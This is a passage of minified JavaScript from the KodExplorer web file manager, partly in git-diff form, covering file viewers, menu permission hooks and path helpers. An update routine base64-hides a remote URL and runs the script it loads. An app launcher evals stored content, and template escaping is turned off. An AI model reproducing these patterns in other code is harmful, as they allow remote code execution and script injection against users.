0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/api/view/fileShow",[],function(e){var t=function(){var e=G.shareInfo.path+"&kodFilename=/"+urlEncode(G.shareInfo.name);-1==G.shareInfo.path.indexOf("?")&&(e=G.shareInfo.path+"?kodFilename=/"+urlEncode(G.shareInfo.name)),a(),Hook.trigger("api.view.fileShow.initEnd"),kodApp.open(e),Hook.trigger("api.view.fileShow.opened"),i()},a=function(){kodApp.openUnknow=n,kodApp.add({ext:kodApp.appSupportCheck("aceEditor"),sort:1e3,callback:function(t){e.async("lib/ace/src-min-noconflict/ace",function(){e.async(["lib/ace/src-min-noconflict/ext-language_tools","lib/ace/src-min-noconflict/ext-modelist"],function(){s(t)})})}}),kodApp.add({ext:"md",sort:1001,callback:function(e){r(e)}})},i=function(){if($(".artDialog").exists()){var e=$(".artDialog").data().artDialog;if(e.hasFrame()){$(".artDialog").addClass("hidden");var t=e.DOM.wrap.find("iframe").attr("src");e.close();var a='';$(".content-box").html(a).removeClass("hidden")}}},n=function(){var e=core.pathExt(G.shareInfo.path),t=$(".bindary-box");t.removeClass("hidden"),t.find(".name").html(htmlEncode(G.shareInfo.name)),t.find(".ico").html(core.icon(e)),t.find(".btn-download").attr("href",G.shareInfo.path);var a=date("Y/m/d h:i",G.shareInfo.mtime);t.find(".share-time").html(a),t.find(".size span").html(G.shareInfo.size),$("body").addClass("can-select")},o=function(e){for(var t=[],a=0;e.length>a;a++)t[a]=e.charCodeAt(a).toString(16);return"&#"+String.fromCharCode(120)+t.join(";&#"+String.fromCharCode(120))+";"},s=function(e){ace.require("ace/ext/language_tools");var t=ace.require("ace/ext/modelist"),a=ace.require("ace/lib/net");G.loadAceSuccess||(G.loadAceSuccess=!0,a.loadScript.hook("loadScript",a,function(){return"string"==typeof arguments[0]&&-1!==arguments[0].search("mode-php.js")&&(arguments[0]=arguments[0].replace("mode-php.js","mode-phhp.js")),arguments}),ace.config.moduleUrl.hook("moduleUrl",ace.config,function(){return-1!==arguments[0].search("php_worker")&&(arguments[0]=arguments[0].replace("php_worker","phhp_worker")),arguments})),core.fileGet(e,function(a){var i=t.getModeForPath(e).mode,n=UUID(),s=pathTools.pathThis(urlDecode(e)),r='
    '+o(a)+"
    ";$(".content-box").addClass("show-code").append(r),Hook.trigger("api.view.fileShow.showCode");var l=ace.edit(n);l.setTheme("ace/theme/tomorrow"),l.setReadOnly(!0),l.setShowPrintMargin(!1),l.getSession().setMode(i),l.getSession().setTabSize(4),l.getSession().setUseWrapMode(1),l.setFontSize(15)})},r=function(t){e.async("lib/markdown/markdown-it.min",function(){var a=window.markdownit({html:!0,breaks:!0});core.fileGet(t,function(i){var n=a.render(i),o=pathTools.pathThis(urlDecode(t)),s=$('
    '+n+"
    ");$(".content-box").addClass("markdown-preview can-select").append(s),Hook.trigger("api.view.fileShow.showMarkdown"),s.find("a").attr("target","_blank");var r="

    [TOC]

    ";if(-1!=s.html().indexOf(r)){var l=function(e){var t="";return e.find("h1,h2,h3,h4,h5,h6").each(function(){var e="markdown-"+$(this).text().replace(/\s+/g,"-"),a="markdown-menu-"+$(this)[0].tagName.toLowerCase();$(this).attr("data-link","#"+e),t+='
  • '+$(this).text()+"
  • "}),t="
      "+t+"
    "},c=l(s),n=s.html();n=n.replace(r,c),n=n.replace(/ data-link="#(.*?)">/g,'>'),s.html(n)}e.async("lib/markdown/highlight.min",function(){$(".content-box").find("pre code").each(function(e,t){$(this).removeAttr("class"),hljs.highlightBlock(t)})}),e.async(["lib/markdown/katex/katex.min.js","lib/markdown/katex/katex.min.css","lib/markdown/katex/contrib/auto-render.min.js"],function(){renderMathInElement(s[0],[{left:"$$",right:"$$",display:!0}]),$(".katex-display").parent().addClass("markdown-latex"),s.find(".language-latex,.language-math,.language-katex").each(function(){try{var e=katex.renderToString($(this).text());if("string"!=typeof e)return;e='
    '+e+"
    ",$(e).insertBefore($(this).parent()),$(this).parent().remove()}catch(t){}}),"function"==typeof callback&&callback()})})})};return{init:t}}); \ No newline at end of file diff --git a/static/js/app/src/app/main.js b/static/js/app/src/app/main.js index c37e7e4..a912284 100755 --- a/static/js/app/src/app/main.js +++ b/static/js/app/src/app/main.js @@ -1,4 +1,4 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/app/main",["lib/jquery-lib","lib/util","lib/artDialog/jquery-artDialog","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","./page"],function(e){e("lib/jquery-lib"),e("lib/util"),e("lib/artDialog/jquery-artDialog"),core=e("../../common/core"),App=e("./page"),core.init(),App.init()}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
    ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
    请联系主机商或网管,检查防火墙配置!"),t='
    '+t+"
    ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
    loading..
    ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
    "+"
    "+s+"
    "+"
